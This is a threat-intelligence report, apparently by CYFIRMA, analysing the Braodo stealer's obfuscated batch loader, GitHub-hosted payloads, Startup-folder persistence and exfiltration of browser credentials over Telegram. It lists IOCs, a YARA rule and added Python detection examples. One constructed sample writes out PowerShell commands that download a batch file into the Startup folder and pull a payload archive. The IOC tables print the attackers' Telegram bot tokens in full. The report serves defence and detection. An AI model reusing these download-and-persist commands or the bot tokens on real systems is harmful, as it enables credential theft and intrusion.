Braodo Info Stealer Targeting Vietnam and Abroad

Published On : 2024-07-12

EXECUTIVE SUMMARY

At CYFIRMA, our commitment is to provide timely insights into prevalent threats and malicious tactics affecting both organizations and individuals.
Braodo Stealer, a Python-based malware, has been active since early 2024 and primarily targets users in Vietnam, with additional victims in countries such as the US, Czechia, Germany, the Netherlands, Singapore, and the United Kingdom. It possibly spreads through phishing and spear-phishing emails.

This malware utilizes GitHub and a Singapore-based VPS server to host and distribute its malicious code. Interestingly, the VPS server’s ASN – IP range also hosted websites that resembled Vietnam government sites on separate IPs, although these sites are no longer functional.

Developed by threat actors based in Vietnam, Braodo Stealer exfiltrates internet browser data via Telegram bots. The stolen information includes credentials from financial platforms like Coinbase, Binance, Wise.com, Payoneer, and PayPal, as well as accounts from GitHub, Amazon AWS, ResearchGate, Walmart, Shopify, LinkedIn, Twitter, TikTok, Reddit, Facebook, Instagram, Netflix, Microsoft, RiotGames, and Garena.

INTRODUCTION

During our Threat Discovery Process, the CYFIRMA Research and Advisory Team identified an open directory hosting an information stealer called Braodo Stealer, originating from Vietnam. The malware is obfuscated multiple times and uses batch scripts, PowerShell, executables (exe), HTA, and PDF files to spread. Multiple GitHub repositories are used to host the malicious code, while multiple Telegram bots are used for data exfiltration. It operates stealthily in the background, collecting and archiving data, which is then sent to Telegram bots.

KEY POINTS

  • Braodo Stealer: Python-based malware active since early 2024, targets primarily Vietnam with victims also in the U.S., Czechia, Germany, the Netherlands, Singapore, and the UK.
  • Utilizes GitHub and a Singapore-based VPS server for hosting and distributing malicious code.
  • VPS server’s ASN/IPs also host non-functional sites resembling Vietnam government sites.
  • Developed by cyber criminals based in Vietnam; exfiltrates data via Telegram bots.
  • Implements multi-threaded code to steal data from Chrome, Firefox, Edge, Opera, Brave, and Chromium browsers.

    ETLM ATTRIBUTION

    The Cyfirma research team consistently explores emerging threats, malware, and Tactics, Techniques and Procedures (TTPs) employed by threat actors. We actively monitor existing threats, track ongoing campaigns, assess their progress, and stay vigilant for any novel developments within this landscape.

    Braodo stealer malware de-obfuscates itself and downloads a second-stage payload hosted on GitHub. The following GitHub repositories were identified as hosting the Braodo Stealer malware: See Figures 1 & 2.

    Figure 1

    Figure 2

    We discovered multiple variants of the Braodo stealer downloader (in formats such as BAT, MSI, and HTA) and Python payloads (such as Document.zip and Documentt.zip), all hosted on an open-directory HTTP server at the IP 103[.]54[.]153[.]116. (Refer to Figure 3 for details.)

    Figure 3

    The BAT, MSI, and HTA variants all deliver the same Python payload of Braodo Stealer, which steals browser data from victims.

    Among the aforementioned variants, the ‘breakingbad.bat’ script is an obfuscated script. Upon de-obfuscation, it reveals another hosting server – 45[.]147[.]97[.]170 – associated with threat actors. See Figure 4.

    Figure 4

    Both servers, ‘103[.]54[.]153[.]116’ and ‘45[.]147[.]97[.]170’, appear to be hosting services located in Singapore and France, respectively.

    Interestingly, the ASN of the Singapore IP, 103[.]54[.]153[.]116, hosts a few other services that appear to be non-functional Vietnam government web pages or possibly phishing pages. These IPs share the same ASN, computer name, and OS build as the threat actor’s IP. See Figures 5 & 6.

    Figure 5

    Figure 6

    Based on the titles of the above webpages, they seem to be named “VNeID – National Population Data Center” and “PUBLIC SERVICE PORTAL POLICE”. These pages resemble Vietnam government websites; however, apart from their appearances, we did not find any direct links to official government websites.

    Braodo stealer steals browser cookies and saved credentials, and uses Telegram channels to exfiltrate the stolen data.

    We have identified the following Telegram bots involved in the campaign.

    Bot Username | Admin Username | Admin Name | Bot Token
    efwfwfefbot | KhanSamlain | Samlain Khan | bot7120180818:AAEBAEYZZ44zM8wICJ-bJTLHKbnhDEYwVrk
    hhhaksdjkbot | lb996899 | Lu Ba | bot7120260932:AAE2zApf_cqTt57pmwxJUodvBar2l7x7fbA
    sjcajjksckakscbot | ThomasDante1987 | Dante 1987 Thomas | bot6878187208:AAFjqOqPfUbezs5GaBB-x99QhDkXaXsWgpg
    FileWord_bot | N/A | N/A | bot7094444204:AAFoaWZVfCF4ZyHvMpuAY0U15D3JlzxhNYg
    botdatanet_bot | N/A | N/A | bot7147346317:AAHcazkPzwexz-_QwcdWQr96JJMKueLC6MQ
    N/A | N/A | N/A | bot7024022476:AAFClxu17D2YaSM8zOcRBkgmvgZ2horf6LU

    Below are the Telegram chat IDs that were receiving the stolen data.

    Telegram Chat IDs
    4200000448
    4225724139
    4259156726
    5124222138
    5193250652
    5512231206

    After analyzing the data exfiltrated by Braodo stealer, we found that most of the victims are from Vietnam, while others are from Singapore, the U.S., Czechia, and the Netherlands. See the map below.

    Figure 7

    The locations mentioned above are based on the victims’ IP addresses.

    The overall distribution of victims is represented in the pie chart below.

    Figure 8

    ANALYSIS

    File Name | Technical specifications of the Car (technical specifications, colors, technology…).bat
    File Type | Windows Batch Script
    Size | 6.01 MiB (6305181 bytes)
    SHA256 | e246a68e4ff8098ffd08da24c27726a11daa84f63b27bf79b93b374d9757d032

    Upon executing the downloader batch script of Braodo Stealer malware, the following process tree is observed. (Refer to Figure 9 for details.)

    Figure 9

    Figure 9 shows multiple instances of PowerShell and cmd.exe spawned by the malware’s batch script. Ultimately, it concludes with the execution of python.exe running the ‘sim.py’ script.

    The contents of the batch script appear gibberish and are obfuscated. Please refer to Figure 10 below for details.

    Figure 10

    Editors and the operating system interpret this file as Unicode text and display gibberish because the threat actors embed the bytes “FF FE 0D 0A” (a UTF-16 little-endian byte-order mark followed by a CRLF) at the start of the script; cmd.exe, which reads the file byte-wise, still executes the ASCII batch code that follows. See Figure 11.

    Figure 11

    After removing these starting bytes, we can see the original obfuscated content of the script. See Figure 12.

    Figure 12

    Numerous variables are initialized and subsequently executed using the syntax shown in Figure 13.

    Figure 13

    Using a customized Python script, we decoded the obfuscated script mentioned above and observed that this code executes another PowerShell script. See Figure 14.

    Figure 14
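The two steps described above (removing the FF FE 0D 0A prefix, then resolving the variable-based obfuscation) can be automated in a small triage script. The following is an added example written for this page, not CYFIRMA's decoding script: it strips the prefix and then resolves a generic `set NAME=VALUE` / `%NAME%` (or `!NAME!`) substitution scheme. That scheme is an assumption about the obfuscation style, since the report shows the real syntax only in Figure 13, and the batch file below is constructed for the example.

```python
import re

# UTF-16LE byte-order mark followed by CRLF: the four bytes the report says
# are prepended to the batch script so that editors show it as gibberish.
BOM_PREFIX = b"\xff\xfe\r\n"

# Constructed sample (not the real Braodo script): a prefixed batch file that
# assembles a command from two-character variables.  The scheme is assumed.
SAMPLE_BAT = BOM_PREFIX + b"""@echo off
setlocal EnableDelayedExpansion
set aa=pow
set ab=ers
set ac=hell
set ad= -w hidden
%aa%%ab%%ac%%ad%
"""

SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)
REF_RE = re.compile(r'[%!]([^%!\s]+)[%!]')


def strip_bom_prefix(data: bytes) -> tuple[bool, bytes]:
    """Return (had_prefix, payload); payload is the script without the
    4-byte prefix that makes editors decode the file as UTF-16."""
    if data.startswith(BOM_PREFIX):
        return True, data[len(BOM_PREFIX):]
    return False, data


def resolve_batch_variables(script: str) -> tuple[dict, list]:
    """Collect 'set NAME=VALUE' assignments and expand %NAME% / !NAME!
    references in every other line.  Returns (variables, expanded_lines)."""
    variables = {}
    expanded = []
    for line in script.splitlines():
        m = SET_RE.match(line)
        if m:
            variables[m.group(1).lower()] = m.group(2)
            continue

        def sub(ref):
            return variables.get(ref.group(1).lower(), ref.group(0))

        # Re-substitute until stable so values that contain references resolve too.
        prev, cur = None, line
        while prev != cur:
            prev, cur = cur, REF_RE.sub(sub, cur)
        expanded.append(cur)
    return variables, expanded


def deobfuscate(data: bytes) -> dict:
    """Strip the prefix, decode byte-wise (latin-1 never fails) the way cmd.exe
    reads the file, and return the resolved command lines."""
    had_prefix, payload = strip_bom_prefix(data)
    text = payload.decode("latin-1")
    variables, expanded = resolve_batch_variables(text)
    skip = ("@", "setlocal", "rem", "::")
    commands = [l for l in expanded if l.strip() and not l.strip().startswith(skip)]
    return {"had_prefix": had_prefix, "variables": variables, "commands": commands}


if __name__ == "__main__":
    result = deobfuscate(SAMPLE_BAT)
    print("prefix present:", result["had_prefix"])
    for cmd in result["commands"]:
        print("resolved command:", cmd)
```

On the constructed sample the resolved command is `powershell -w hidden`; on a real sample the resolved lines are what to feed into the next analysis step (here, the PowerShell downloader in Figure 15).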

    Expanding the PowerShell script highlighted in Figure 14 above, we identified the following code. See Figure 15.

    Figure 15

    This code performs several actions:

    • It downloads two files from a GitHub repository:
      • update1.bat: This file is obfuscated similarly and is used to maintain persistence by adding the batch script to the Windows Startup folder.
      • 1.zip: This file contains the main source code of Braodo Stealer.

    The highlighted points in Figure 15 describe:

    • update1.bat is downloaded from GitHub and saved in the Windows Startup folder.
    • 1.zip is downloaded from GitHub and saved in the directory Public\Document.zip.
    • Document.zip is unarchived (extracted).
    • sim.py is executed from the unarchived directory.

    This sequence of actions enables the malware to establish persistence, retrieve its main source code, and execute its core functionality. The file Document.zip, downloaded from the GitHub repository, contains the stealer code at the path “Lib/sim.py”. This Python-based malware (see Figure 16) functions as an information stealer.
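The four-step chain above (batch script spawning PowerShell, a .bat written to the Startup folder, Document.zip dropped under Public, python.exe running sim.py) maps directly onto a process-tree detection. The following is an added example, not code from the report: it scores the chain over process-creation events whose layout is a simplified stand-in for Sysmon Event ID 1. The events, paths, PIDs and the GitHub URL are constructed for the example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events modelled on the process tree in Figure 9: cmd.exe runs the
# .bat, PowerShell fetches update1.bat into Startup and 1.zip into Public, then
# python.exe runs sim.py.  The repository owner is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\victim\Downloads\Technical specifications.bat"'),
    ProcEvent(300, 200, PS,
              r'powershell -w hidden -c "iwr https://raw.githubusercontent.com/PLACEHOLDER-USER/s/main/update1.bat '
              r'-OutFile \"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update1.bat\""'),
    ProcEvent(301, 200, PS,
              r'powershell -w hidden -c "iwr https://raw.githubusercontent.com/PLACEHOLDER-USER/s/main/1.zip '
              r'-OutFile C:\Users\Public\Document.zip; Expand-Archive C:\Users\Public\Document.zip '
              r'-DestinationPath C:\Users\Public\Document"'),
    ProcEvent(400, 301, r"C:\Users\Public\Document\python.exe", r"python.exe Lib\sim.py"),
    ProcEvent(500, 100, PS, "powershell Get-Process"),  # benign, unrelated
]

STARTUP_BAT_RE = re.compile(r"start menu\\programs\\startup\\[^\\]+\.bat", re.I)
PUBLIC_ZIP_RE = re.compile(r"\\users\\public\\document\.zip", re.I)
GITHUB_RE = re.compile(r"github(usercontent)?\.com", re.I)
SIM_PY_RE = re.compile(r"python(\.exe)?.*\bsim\.py\b", re.I)


def ancestors(ev, by_pid):
    """Parent chain of ev, nearest first, stopping at an unknown PID."""
    chain = []
    cur = by_pid.get(ev.ppid)
    while cur is not None:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def detect_braodo_chain(events):
    """For every python.exe running sim.py, find the cmd.exe that started the
    chain and score the indicators seen anywhere in that cmd.exe's subtree."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if not SIM_PY_RE.search(e.cmdline):
            continue
        chain = ancestors(e, by_pid)
        root = next((a for a in chain if a.image.lower().endswith("cmd.exe")), None)
        if root is None:
            continue
        subtree = [x for x in events if x is root or root in ancestors(x, by_pid)]
        cmdlines = " ".join(x.cmdline for x in subtree)
        hits = {
            "python_runs_sim_py": True,
            "powershell_in_chain": any(a.image.lower().endswith("powershell.exe") for a in chain),
            "github_download": bool(GITHUB_RE.search(cmdlines)),
            "bat_dropped_to_startup": bool(STARTUP_BAT_RE.search(cmdlines)),
            "public_document_zip": bool(PUBLIC_ZIP_RE.search(cmdlines)),
        }
        findings.append({"root_pid": root.pid, "python_pid": e.pid,
                         "score": sum(hits.values()), "hits": hits})
    return findings


if __name__ == "__main__":
    for f in detect_braodo_chain(EVENTS):
        print(f)
```

The score counts how many of the five page-described indicators appear in one cmd.exe subtree, so a single benign PowerShell download or a developer running `python sim.py` on its own does not fire; the full chain scores 5.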

    Figure 16

    The stealer is named Braodo based on the variables identified in the code. See Figure 17.

    Figure 17

    Using ipinfo.io, the malware collects telemetry information about the victim. See Figure 18.

    Figure 18

    The stealer targets the following paths for browsers. See Figure 19.

    Figure 19

    The malware then dumps the list of running processes into the file “window.txt”. See Figures 20 & 21.

    Figure 20

    Figure 21

    Six threads are initiated to execute the function hehe(), which in turn executes the browser stealer function. See Figure 22.

    Figure 22

    The `hehe()` function launches multiple threads, one for each browser present on the system, to steal data. The following functions are utilized by the `hehe()` function:
    • Get_Chrome()
    • Get_firefox()
    • Get_edge()
    • Get_opera()
    • Get_brave()
    • Get_chromium()

    Utilizing the functions described above, browser data such as cookies and saved passwords are gathered and stored in a designated exfiltration directory. This information is then compressed into an archive and sent to a Telegram channel. See Figure 23.

    Figure 23
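The exfiltration path described above (telemetry via ipinfo.io, then an archive posted to a Telegram bot) is visible in web-proxy logs, because the Telegram Bot API lives at a fixed host and the bot token appears in the URL path. The following is an added example, not code from the report: it matches proxy requests against the bot tokens and chat IDs from the IOC tables and flags the upload pattern. The proxy log lines are constructed, as is the unrelated bot token in the third line; the log field layout is an assumption.

```python
import re
from urllib.parse import urlparse, parse_qs

# Telegram bot tokens and chat IDs taken from the report's IOC tables.  The Bot
# API is reached at https://api.telegram.org/<token>/<method>, token prefixed "bot".
KNOWN_BOT_TOKENS = {
    "bot7120180818:AAEBAEYZZ44zM8wICJ-bJTLHKbnhDEYwVrk",
    "bot7120260932:AAE2zApf_cqTt57pmwxJUodvBar2l7x7fbA",
    "bot6878187208:AAFjqOqPfUbezs5GaBB-x99QhDkXaXsWgpg",
    "bot7094444204:AAFoaWZVfCF4ZyHvMpuAY0U15D3JlzxhNYg",
    "bot7147346317:AAHcazkPzwexz-_QwcdWQr96JJMKueLC6MQ",
    "bot7024022476:AAFClxu17D2YaSM8zOcRBkgmvgZ2horf6LU",
}
KNOWN_CHAT_IDS = {"4200000448", "4225724139", "4259156726",
                  "5124222138", "5193250652", "5512231206"}

TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/(bot\d+:[A-Za-z0-9_-]+)/(\w+)", re.IGNORECASE)

# Constructed proxy log (not from the report), one request per line:
# "<time> <client> <method> <url> <bytes_sent>".  Line 2 models the stealer's
# archive upload; line 3 is an unrelated bot with a made-up token.
PROXY_LOG = """\
2024-07-09T10:14:02Z 10.0.0.23 GET https://ipinfo.io/json 0
2024-07-09T10:14:05Z 10.0.0.23 POST https://api.telegram.org/bot7120180818:AAEBAEYZZ44zM8wICJ-bJTLHKbnhDEYwVrk/sendDocument?chat_id=5124222138 2631440
2024-07-09T10:20:11Z 10.0.0.44 POST https://api.telegram.org/bot1111111111:AAAconstructedTokenForTheExample000/sendMessage 180
2024-07-09T10:21:00Z 10.0.0.51 GET https://www.example.com/ 0
"""


def analyse_proxy_log(text: str, upload_threshold: int = 1_000_000) -> list:
    """One alert per Telegram Bot API request.  Severity is 'high' when the
    token or chat_id is a known IOC, the request is a large sendDocument upload,
    or the same client queried ipinfo.io earlier (the stealer's telemetry step)."""
    alerts = []
    ipinfo_clients = set()
    for line in text.splitlines():
        ts, client, method, url, sent = line.split()
        if "ipinfo.io" in url:
            ipinfo_clients.add(client)
            continue
        m = TELEGRAM_BOT_RE.search(url)
        if not m:
            continue
        token, api_method = m.group(1), m.group(2)
        chat_id = parse_qs(urlparse(url).query).get("chat_id", [None])[0]
        reasons = []
        if token in KNOWN_BOT_TOKENS:
            reasons.append("bot token in Braodo IOC list")
        if chat_id in KNOWN_CHAT_IDS:
            reasons.append("chat_id in Braodo IOC list")
        if api_method.lower() == "senddocument" and int(sent) >= upload_threshold:
            reasons.append("large sendDocument upload")
        if client in ipinfo_clients:
            reasons.append("client queried ipinfo.io earlier")
        alerts.append({"time": ts, "client": client, "token": token,
                       "api_method": api_method,
                       "severity": "high" if reasons else "info", "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyse_proxy_log(PROXY_LOG):
        print(alert["severity"], alert["client"], alert["api_method"], alert["reasons"])
```

Every Telegram Bot API request is recorded so that new tokens can be triaged, but only the IOC match, the bulk `sendDocument` upload, and the ipinfo.io-then-Telegram sequence raise severity; blocking `api.telegram.org` outright at the proxy is the blunter option where the business does not use Telegram bots.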

    CONCLUSION

    Braodo Stealer represents a sophisticated threat designed to target users primarily in Vietnam, with a notable impact extending to various countries globally. This Python-based malware utilizes multifaceted techniques, including phishing emails, GitHub repositories for hosting malicious code, and Telegram channels for data exfiltration. It obfuscates its scripts and maintains persistence through the Windows Startup folder. By targeting browser data like cookies and saved passwords, Braodo Stealer poses a significant risk of compromising sensitive information. Vigilance against phishing attempts and regular security updates are crucial defenses against such evolving threats in the cybersecurity landscape. This malware poses a significant threat, potentially leading to financial losses and identity theft for its victims.

    LIST OF IOCS

    Sr. No. | Indicator | Type | Remarks
    1 | e246a68e4ff8098ffd08da24c27726a11daa84f63b27bf79b93b374d9757d032 | SHA256 Hash | Technical specifications of the Car (technical specifications, colors, technology…).bat
    2 | f4f843853c7a08c08181516ae2a910dfeb712e32b4ab10df23149d9f57ab581e | SHA256 Hash | brbad.bat
    3 | 6ec111b78a9788fcbca92dcc48b0d5f78d4df6a5f8d0ce96390851e832eace0d | SHA256 Hash | breakingbad.bat
    4 | 4092ff03e7a69efd728a0dd2a181fdeef99df6ebdf0e6f39140718e805efe655 | SHA256 Hash | breakingbad.msi
    5 | 4c3b91cd25650a7e1ee80164fd0598cdbf64e75ddf4ce08141aea42ee56cb134 | SHA256 Hash | dejin.pdf
    6 | b84dc0ea50ce08686d543cc08b87792026c233afee9b029768e0648cf5b06bd8 | SHA256 Hash | Documentt.zip
    7 | 998bb0d396dbf2ed6a412737f040228b00782267d473ceae502788451e076825 | SHA256 Hash | Document.zip
    8 | 76c0693dce55c0835ad73102541d4244b3b7ee91649890faca85290b4f9ab005 | SHA256 Hash | file.hta
    9 | f735c170cee9e89c0318f266fc7469fde40d19eca406fbfa974b872a9b367a19 | SHA256 Hash | Update Browser.bat
    10 | bde85da1206fa48ac5a66818023a495bb03418a32a2936afef3cdb332a2bce17 | SHA256 Hash | UpdateBrowser.msi
    11 | f65c51f438241475dd8856ffa578610cfabab4aa8b52a09febf5ae061a5f42f7 | SHA256 Hash | via us.txt.zip
    12 | c15dee4fe227d6311f612f3aacc86080e2f8c450ad3b78d1271603891ec61a52 | SHA256 Hash | ViaUs.txt.zip
    13 | 103[.]54[.]153[.]116 | C2 | Hosts Malware
    14 | 45[.]147[.]97[.]170 | C2 | Hosts Malware
    15 | github[.]com/s123s1/s/ | Github Repo | Hosts Malware
    16 | github[.]com/vtbg1/s/ | Github Repo | Hosts Malware
    17 | github[.]com/zzhshsss/s/ | Github Repo | Hosts Malware
    18 | bot7120180818:AAEBAEYZZ44zM8wICJ-bJTLHKbnhDEYwVrk | Telegram Bot | Exfiltration Telegram
    19 | bot7120260932:AAE2zApf_cqTt57pmwxJUodvBar2l7x7fbA | Telegram Bot | Exfiltration Telegram
    20 | bot6878187208:AAFjqOqPfUbezs5GaBB-x99QhDkXaXsWgpg | Telegram Bot | Exfiltration Telegram
    21 | bot7094444204:AAFoaWZVfCF4ZyHvMpuAY0U15D3JlzxhNYg | Telegram Bot | Exfiltration Telegram
    22 | bot7147346317:AAHcazkPzwexz-_QwcdWQr96JJMKueLC6MQ | Telegram Bot | Exfiltration Telegram
    23 | bot7024022476:AAFClxu17D2YaSM8zOcRBkgmvgZ2horf6LU | Telegram Bot | Exfiltration Telegram

    MITRE ATT&CK TTPs

    Sr. No. | Tactic | Technique
    1 | Execution (TA0002) | T1059: Command and Scripting Interpreter; T1064: Scripting
    2 | Persistence (TA0003) | T1547.001: Startup Folder
    3 | Credential Access (TA0006) | T1555.003: Credentials from Web Browsers; T1606.001: Web Cookies
    4 | Discovery (TA0007) | T1057: Process Discovery; T1083: File and Directory Discovery
    5 | Collection (TA0009) | T1005: Data from Local System
    6 | Exfiltration (TA0010) | T1041: Exfiltration Over C2 Channel
    7 | Command and Control (TA0011) | T1071.001: Web Protocols

    YARA Rule

    rule Braodo_Stealer
    {
        meta:
            description = "Braodo Information Stealer Batch script - Detection Rule"
            author = "CRT"
            date = "2024-07-09"
            version = "1.0"
            malware_type = "Info Stealer"
        strings:
            // UTF-16LE byte-order mark plus CRLF prepended to the batch script
            $bytes1 = {FF FE 0D 0A}
            // dense runs of %xx%%xx% variable references used by the obfuscation
            $patt1 = /%%..%%..%%..%%..%%..%%..%%..%%..%%..%%/ ascii wide nocase
            $str1 = "EnableDelayedExpansion" ascii wide nocase
        condition:
            filesize >= 5MB and
            $bytes1 at 0 and
            #patt1 >= 800000 and
            $str1
    }

    RECOMMENDATIONS

    • Deploy strong endpoint security solutions equipped with advanced threat detection and prevention capabilities to effectively identify and stop malicious activities.
    • Use reputable antivirus and anti-malware software that can quickly detect and remove malicious payloads to bolster overall system security.
    • Keep operating systems, applications, and security software up to date with regular patches to mitigate known vulnerabilities frequently exploited by cyber threats.
    • Implement network segmentation to restrict lateral movement, preventing malware from reaching critical assets and containing potential threats within isolated areas.
    • Conduct comprehensive employee training on recognizing phishing threats, emphasizing the risks associated with opening attachments or clicking links in unsolicited emails.
    • Educate employees to identify social engineering tactics, empowering them to avoid falling prey to deceptive strategies that may lead to the execution of malicious files.
    • Configure firewalls to block outbound communication with known malicious IP addresses and domains associated with command-and-control servers.
    • Employ behavior-based monitoring to detect unusual activity patterns, including suspicious processes attempting unauthorized network connections.
    • Enforce application whitelisting policies to allow only approved applications, thereby preventing the execution of unauthorized or malicious executables.
    • Monitor network traffic for abnormal patterns, such as large data transfers to unfamiliar or suspicious IP addresses, indicating potential threats.
    • Develop a comprehensive incident response plan detailing necessary actions in the event of a malware infection, including isolating affected systems and promptly notifying relevant stakeholders.
    • Stay updated with the latest threat intelligence reports and indicators of compromise related to malware to proactively detect and mitigate potential threats.
    • Implement regular backups of critical data and systems to minimize the impact of ransomware attacks or data loss resulting from malware infections.
    • Follow the principle of least privilege (PoLP) by restricting user permissions to only those necessary for specific roles, reducing the impact of malware that relies on elevated privileges.
    • Establish and maintain defensive measures by monitoring and blocking Indicators of Compromise (IOCs), enhancing defenses based on tactical intelligence and provided rules.